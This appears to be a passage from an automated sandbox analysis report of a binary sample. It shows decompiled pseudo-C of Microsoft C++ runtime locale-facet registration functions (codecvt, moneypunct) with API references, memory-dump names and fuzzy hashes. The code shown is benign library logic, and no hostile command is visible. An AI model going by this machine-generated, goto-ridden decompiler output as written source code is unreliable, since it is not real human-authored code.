																																																																						 *((char*)(_t967 + 0x28)) =  *((intOrPtr*)(_t990 + 0x10));
																																																																						E6E1D542F(_t699, _t853, _t920, _t943, _t967,  *_t315);
																																																																						return E6E1E0075(_t967,  *((intOrPtr*)(_t990 + 8)));
																																																																					} else {
																																																																						_t943 =  *(_t990 - 0x10);
																																																																						 *(_t990 - 0x10) = _t943;
																																																																						 *(_t990 - 4) = 1;
																																																																						E6E1C6FD3(__eflags, _t943);
																																																																						 *0x6e22a26c();
																																																																						 *((intOrPtr*)( *((intOrPtr*)( *_t943 + 4))))();
																																																																						 *0x6e286dd0 = _t943;
																																																																						goto L152;
																																																																					}
																																																																				} else {
																																																																					_t943 = _t966;
																																																																					goto L152;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			_t942 =  *(_t990 - 0x10);
																																																																			 *(_t990 - 0x10) = _t942;
																																																																			 *(_t990 - 4) = 1;
																																																																			E6E1C6FD3(__eflags, _t942);
																																																																			 *0x6e22a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t942 + 4))))();
																																																																			 *0x6e286e00 = _t942;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t942 = _t965;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t941 =  *(_t990 - 0x10);
																																																																 *(_t990 - 0x10) = _t941;
																																																																 *(_t990 - 4) = 1;
																																																																E6E1C6FD3(__eflags, _t941);
																																																																 *0x6e22a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t941 + 4))))();
																																																																 *0x6e286dcc = _t941;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t941 = _t964;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t940 =  *(_t990 - 0x10);
																																																													 *(_t990 - 0x10) = _t940;
																																																													 *(_t990 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t940);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t940 + 4))))();
																																																													 *0x6e286dfc = _t940;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t940 = _t963;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t939 =  *(_t990 - 0x10);
																																																										 *(_t990 - 0x10) = _t939;
																																																										 *(_t990 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t939);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t939 + 4))))();
																																																										 *0x6e286de0 = _t939;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t939 = _t962;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t938 =  *(_t990 - 0x10);
																																																							 *(_t990 - 0x10) = _t938;
																																																							 *(_t990 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t938);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t938 + 4))))();
																																																							 *0x6e286ddc = _t938;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t938 = _t961;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t937 =  *(_t990 - 0x10);
																																																				 *(_t990 - 0x10) = _t937;
																																																				 *(_t990 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t937);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t937 + 4))))();
																																																				 *0x6e286db0 = _t937;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t937 = _t960;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t936 =  *(_t990 - 0x10);
																																																	 *(_t990 - 0x10) = _t936;
																																																	 *(_t990 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t936);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t936 + 4))))();
																																																	 *0x6e286dd8 = _t936;
																																																	goto L103;
																																																}
																																															} else {
																																																_t936 = _t959;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t935 =  *(_t990 - 0x10);
																																														 *(_t990 - 0x10) = _t935;
																																														 *(_t990 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t935);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t935 + 4))))();
																																														 *0x6e286dc4 = _t935;
																																														goto L96;
																																													}
																																												} else {
																																													_t935 = _t958;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t934 =  *(_t990 - 0x10);
																																											 *(_t990 - 0x10) = _t934;
																																											 *(_t990 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t934);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t934 + 4))))();
																																											 *0x6e286dc8 = _t934;
																																											goto L89;
																																										}
																																									} else {
																																										_t934 = _t957;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t933 =  *(_t990 - 0x10);
																																								 *(_t990 - 0x10) = _t933;
																																								 *(_t990 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t933);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t933 + 4))))();
																																								 *0x6e286df4 = _t933;
																																								goto L82;
																																							}
																																						} else {
																																							_t933 = _t956;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t932 =  *(_t990 - 0x10);
																																					 *(_t990 - 0x10) = _t932;
																																					 *(_t990 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t932);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t932 + 4))))();
																																					 *0x6e286df8 = _t932;
																																					goto L75;
																																				}
																																			} else {
																																				_t932 = _t955;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t931 =  *(_t990 - 0x10);
																																		 *(_t990 - 0x10) = _t931;
																																		 *(_t990 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t931);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t931 + 4))))();
																																		 *0x6e286dc0 = _t931;
																																		goto L68;
																																	}
																																} else {
																																	_t931 = _t954;
																																	goto L68;
																																}
																															}
																														} else {
																															_t930 =  *(_t990 - 0x10);
																															 *(_t990 - 0x10) = _t930;
																															 *(_t990 - 4) = 1;
																															E6E1C6FD3(__eflags, _t930);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t930 + 4))))();
																															 *0x6e286df0 = _t930;
																															goto L61;
																														}
																													} else {
																														_t930 = _t953;
																														goto L61;
																													}
																												}
																											} else {
																												_t929 =  *(_t990 - 0x10);
																												 *(_t990 - 0x10) = _t929;
																												 *(_t990 - 4) = 1;
																												E6E1C6FD3(__eflags, _t929);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t929 + 4))))();
																												 *0x6e286dbc = _t929;
																												goto L54;
																											}
																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6E1C6FD3(__eflags, _t928);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6e286dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6E1C6FD3(__eflags, _t927);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6e286db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6E1C6FD3(__eflags, _t926);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6e286de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6E1C6FD3(__eflags, _t925);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6e286dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6E1C6FD3(__eflags, _t924);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6e286db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6E1C6FD3(__eflags, _t923);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6e286de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6E1C6FD3(__eflags, _t922);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6e286e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CEEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CEEFC
int.LIBCPMT ref: 6E1CEF13

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1CEF36
std::_Facet_Register.LIBCPMT ref: 6E1CEF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CEF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CEF8B

Strings

0k(n, xrefs: 6E1CEF07

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0k(n
API String ID: 2594415655-1656414601
Opcode ID: b10d0f690c0b2f7a685d39a62aa587796238668072990ed8f3ae1ffc3187c861
Instruction ID: aef53a23d998b24e4ae2cb3cfea3f7f9e8a4c4e67e5b70a9c63103f4c7b100a0
Opcode Fuzzy Hash: b10d0f690c0b2f7a685d39a62aa587796238668072990ed8f3ae1ffc3187c861
Instruction Fuzzy Hash: EA113675920519CBCF01EBE4C854AFEB77ABF64B14F140908E420E7290DF789E84EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t462 - 0x14, 0);
				_t441 =  *0x6e286dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1A161C(0x6e286d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E1C66BA(_t462 - 0x14);
					return E6E1E0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E1D1230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t462 - 0x20);
							E6E1E3D74(_t462 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t430, _t441, 0x14);
							E6E1C6653(_t462 - 0x14, 0);
							_t442 =  *0x6e286dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1A161C(0x6e286d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E1C66BA(_t462 - 0x14);
								return E6E1E0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E1D12B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t462 - 0x20);
										E6E1E3D74(_t462 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t327, _t431, _t442, 0x14);
										E6E1C6653(_t462 - 0x14, 0);
										_t443 =  *0x6e286dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1A161C(0x6e286d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E1C66BA(_t462 - 0x14);
											return E6E1E0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E1D1339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t462 - 0x20);
													E6E1E3D74(_t462 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t327, _t432, _t443, 0x14);
													E6E1C6653(_t462 - 0x14, 0);
													_t444 =  *0x6e286db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1A161C(0x6e286d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E1C66BA(_t462 - 0x14);
														return E6E1E0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E1D13A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t462 - 0x20);
																E6E1E3D74(_t462 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t327, _t433, _t444, 0x14);
																E6E1C6653(_t462 - 0x14, 0);
																_t445 =  *0x6e286ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1A161C(0x6e286d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E1C66BA(_t462 - 0x14);
																	return E6E1E0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E1D1409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t462 - 0x20);
																			E6E1E3D74(_t462 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t327, _t434, _t445, 0x14);
																			E6E1C6653(_t462 - 0x14, 0);
																			_t446 =  *0x6e286de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1A161C(0x6e286d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E1C66BA(_t462 - 0x14);
																				return E6E1E0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E1D1471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t462 - 0x20);
																						E6E1E3D74(_t462 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t327, _t435, _t446, 0x14);
																						E6E1C6653(_t462 - 0x14, 0);
																						_t447 =  *0x6e286dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1A161C(0x6e286da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E1C66BA(_t462 - 0x14);
																							return E6E1E0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E1D14EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t462 - 0x20);
																									E6E1E3D74(_t462 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t327, _t436, _t447, 0x14);
																									E6E1C6653(_t462 - 0x14, 0);
																									_t448 =  *0x6e286dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1A161C(0x6e286d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E1C66BA(_t462 - 0x14);
																										return E6E1E0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E1D1558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t462 - 0x20);
																												E6E1E3D74(_t462 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t327, _t437, _t448, 0x14);
																												E6E1C6653(_t462 - 0x14, 0);
																												_t449 =  *0x6e286e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1A161C(0x6e286dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E1C66BA(_t462 - 0x14);
																													return E6E1E0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E1D15C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t462 - 0x20);
																															E6E1E3D74(_t462 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t327, _t438, _t449, 0x14);
																															E6E1C6653(_t462 - 0x14, 0);
																															_t450 =  *0x6e286dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1A161C(0x6e286d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6E1C66BA(_t462 - 0x14);
																																return E6E1E0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E1D162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1A1438(_t397);
																																		E6E1E3D74(_t462 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e22851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e22c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E1D542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E1E0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t439);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e286dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E1C6FD3(__eflags, _t438);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e286e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E1C6FD3(__eflags, _t437);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e286dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E1C6FD3(__eflags, _t436);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e286dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E1C6FD3(__eflags, _t435);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e286de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E1C6FD3(__eflags, _t434);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e286ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E1C6FD3(__eflags, _t433);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e286db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E1C6FD3(__eflags, _t432);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e286dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E1C6FD3(__eflags, _t431);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e286dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E1C6FD3(__eflags, _t430);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e286dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF6C4
int.LIBCPMT ref: 6E1CF6DB

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF6FE
std::_Facet_Register.LIBCPMT ref: 6E1CF715
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF735
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF753

Strings

|m(n, xrefs: 6E1CF6CF

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |m(n
API String ID: 113178234-3086318270
Opcode ID: fc78a3b27c5135cf34af98996f2bb328d18944f54ae46bfa6ac2d31ad024e69e
Instruction ID: 512abda1d356cdfaf4a93c21c39796c7a73f13f250d808cd22af9e887090983e
Opcode Fuzzy Hash: fc78a3b27c5135cf34af98996f2bb328d18944f54ae46bfa6ac2d31ad024e69e
Instruction Fuzzy Hash: B5113A7591062C9FCF01DBD4C854AFEB77AAFA8B14F240408D020EB290CF7899C9E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t418 - 0x14, 0);
				_t399 =  *0x6e286dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1A161C(0x6e286d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
